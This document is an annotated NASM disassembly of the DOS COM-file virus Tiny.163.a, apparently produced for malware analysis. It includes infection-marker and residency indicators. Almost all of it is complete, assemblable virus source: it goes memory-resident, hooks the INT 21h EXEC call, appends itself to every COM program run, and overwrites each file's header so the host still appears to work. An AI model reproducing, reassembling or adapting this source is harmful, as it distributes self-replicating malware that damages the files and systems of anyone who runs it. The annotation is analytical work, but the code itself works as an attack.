; Disassembly of `Virus.DOS.Tiny.163.a`.
;
; Source: COM file (MD5: 464e8d72ca144494d97b42ede477c8a8).
;
; This virus belongs to the `Tiny Family` family, not to `Tiny Virus`, although VSUM does not list a 163-byte
; version.
; COM image: loaded at offset 100h of the program segment. All offsets below are
; 100h-relative, and return_to_host hands control back to cs:100h at the end.
org 100h
; Segment 0060h (256 bytes up to 0070h). The original author notes this area is
; not used after boot; the installer copies the virus to 0060:0000 and points the
; INT 21h vector there. An INT 21h vector whose segment is 0060h is therefore the
; memory-resident indicator this sample leaves behind.
; See http://oopweb.com/Assembly/Documents/InterList/Volume/MEMORY.LST.
;
k_unused_memory_segment: equ 0x60
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; HOST
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
host:
; Header as planted in an infected victim. `dec bp` assembles to 4Dh ('M') and
; `jmp word` to E9h, so every infected COM file starts with the byte pair 4Dh E9h.
; The infector skips any file whose first byte is 'M' (see new_int21), so this
; header doubles as the reinfection marker.
dec bp
jmp_to_entry_point:
jmp word entry_point ; rel16 displacement at offset 101h; equals the victim's original length once the body is appended (see new_int21)
jmp_to_entry_point_address: equ $-2
; The host's original first byte ('H' of "Hello") was overwritten by the jmp;
; string_start still points at it because return_to_host restores the saved
; four header bytes at 100h before control ever reaches print_string.
string_start: equ $-1
db "ello - This is a 100 COM test file, 1993", 0Ah, 0Dh
db 24h, 1Ah ; '$' terminates the INT 21h/09h string; 1Ah is a trailing EOF byte
times 41 db 41h ; 'A' padding
print_string:
mov ah,9 ; INT 21h/09h: write '$'-terminated string at ds:dx to stdout
mov dx,string_start
int 21h
int 20h ; terminate program
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; VIRUS
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
virus_start:
; Byte-for-byte copy of the four-byte header the virus plants at offset 100h of a
; victim. It is not executed in place (the host's jmp lands on entry_point); it is
; here so new_int21 can write the whole image in one pass and then copy bytes 0-3
; of the same image over the victim's header.
dec bp ; 4Dh — the 'M' the infector tests for, so infected files are skipped
jmp word $+(entry_point-jmp_to_entry_point) ; displacement is patched per victim through virus_start_jmp_address
virus_start_jmp_address: equ $-2
entry_point:
copy_in_memory:
; Register roles: bx = jmp displacement read from the header at 101h, so
; bx+100h = virus_start inside the host image; es:di = 0060:0000 destination;
; cx = byte count.
mov bx,[jmp_to_entry_point_address]
mov cx,k_unused_memory_segment ; also leaves ch = 0, which the later `mov cl,...` loads rely on
mov es,cx
xor di,di
lea si,[bx+100h] ; = virus_start: bx = entry_point-(jmp_to_entry_point+3), entry_point = virus_start+4, jmp_to_entry_point = 101h
mov cl,virus_end - virus_start ; 163 bytes
cld
rep movsb ; resident copy now lives at 0060:0000
; Residency check. On COM entry the word on top of the stack is 0, so `pop ds`
; makes ds address the interrupt vector table (segment 0).
pop ds ; 0 on COM execution
push ds
mov si,21h*4 ; int 21 (offset)
cmp byte [si+2],k_unused_memory_segment ; compares only the low byte of the INT 21h vector segment
jz short return_to_host ; already resident: leave the vector alone
hijack_int_21:
; ds = 0 (IVT), si = 84h (INT 21h vector), es = 0060h. The original far pointer
; is saved into the resident copy's far-jmp operand (v_addr_original_int21), then
; the vector is pointed at new_int21 in segment 0060h. Interrupts are masked
; while the two-word vector is half-written.
mov di,v_addr_original_int21 - virus_start ; offset of the far-jmp operand inside the resident copy
mov cl,2 ; cx = 2 words (cx is 0 after rep movsb)
rep movsw ; original vector -> 0060:v_addr_original_int21; si is now 88h
cli
mov word [si-4],new_int21 - virus_start ; 0000:0084h = new handler offset
mov [si-2],es ; 0000:0086h = 0060h
sti
return_to_host:
; Restore the victim's original four bytes at cs:100h and "return" to 100h so the
; host runs as if untouched. Reached after a fresh install and also when the
; residency check found the virus already installed.
push cs
push cs
pop ds
pop es ; ds = es = cs (host segment)
mov di,100h
push di ; return address consumed by the final ret
lea si,[bx+100h + host_original_header - virus_start] ; saved header inside the in-file virus body
mov cl,2 ; cx = 2 words (cx is 0 after the preceding rep)
rep movsw
ret ; transfers control to cs:100h
new_int21:
; Resident INT 21h filter. Only AH=4Bh (EXEC; ds:dx = ASCIIZ path of the program
; about to run) is handled; everything else is chained to the saved vector.
; Infection sequence: open r/w, read the first 4 bytes into the image's saved-header
; slot, skip if the first byte is 'M' (EXE header, or an already infected file since
; the planted header begins with 4Dh), otherwise append the 163-byte image and
; overwrite the header with `dec bp / jmp word <length>`.
; Observable effects: the file grows by 163 bytes and begins with 4Dh E9h; no
; attribute or date/time restore appears in this listing, so the modification
; timestamp changes. None of the DOS calls below test CF; if the open fails, the
; error code left in ax is used as the handle for the remaining calls.
cmp ah,4Bh ; execution?
jnz short return_to_original_int21
push ax
push bx
push dx
push cx
push ds
mov ax,3D92h ; open for r/w, with some exotic (and useless) sharing attributes
int 21h
mov bx,ax ; handle (CF not checked)
call word move_to_file_start ; lseek(handle, 0, SEEK_SET); also leaves cx = 0
mov ah,3Fh ; read header
mov cl,4 ; cx = 4 bytes
push cs
pop ds ; ds = 0060h, the resident image
mov dx,host_original_header-virus_start ; read into the image's saved-header slot
int 21h
cmp byte [host_original_header-virus_start], 'M' ; EXE file — or already infected (4Dh = dec bp)?
jz short close_file
mov al,2
call word move_file_pointer_partial_call ; ax=4202h - move to file end; returns dx:ax = file length
mov [virus_start_jmp_address - virus_start],ax ; patch the image header's jmp displacement with the low word of the length (dx ignored; no length check)
mov cx,virus_end - virus_start
call word write_to_file ; append the whole image from 0060:0000
call word move_to_file_start
mov cl,4
call word write_to_file ; overwrite the victim's header with image bytes 0-3
close_file:
mov ah,3Eh ; close file
int 21h
pop ds
pop cx
pop dx
pop bx
pop ax
return_to_original_int21:
; Far jmp whose 4-byte operand is overwritten at install time with the original
; INT 21h vector (see hijack_int_21). The 000Bh:40EBh below is the operand as
; captured in this sample, not a fixed target.
jmp word 000Bh:40EBh
v_addr_original_int21: equ $-4
write_to_file:
; Three entry points sharing one tail; each ends in INT 21h with dx = 0 and returns.
;   write_to_file:                  AH=40h, write cx bytes from ds:0 (caller sets cx and ds)
;   move_to_file_start:             AX=4200h, lseek to cx:dx = 0 from file start
;   move_file_pointer_partial_call: AH=42h with al (whence) set by the caller, cx = dx = 0
; bx must hold the file handle on entry. For the write entry new_int21 sets ds = cs
; beforehand so ds:0 is the start of the resident image.
mov ah,40h
jmp word int21_partial_call
move_to_file_start:
xor al,al ; 4200h: go to start of file
move_file_pointer_partial_call:
xor cx,cx
mov ah,42h
int21_partial_call:
xor dx,dx ; offset 0: start of the resident image for reads/writes
int 21h
ret
host_original_header:
; Four-byte slot holding the victim's original header. In the resident image this
; slot is refilled by new_int21's 4-byte read before the image is appended, so each
; infected file carries its own original header here, and return_to_host copies it
; back to 100h at run time. The bytes below are this test host's header:
; `jmp short print_string` (EBh xx), `nop` (90h) and the 'H' of "Hello".
jmp short $+(print_string-host)
nop
db 'H' ; part of the 'Hello...' string
virus_end: equ $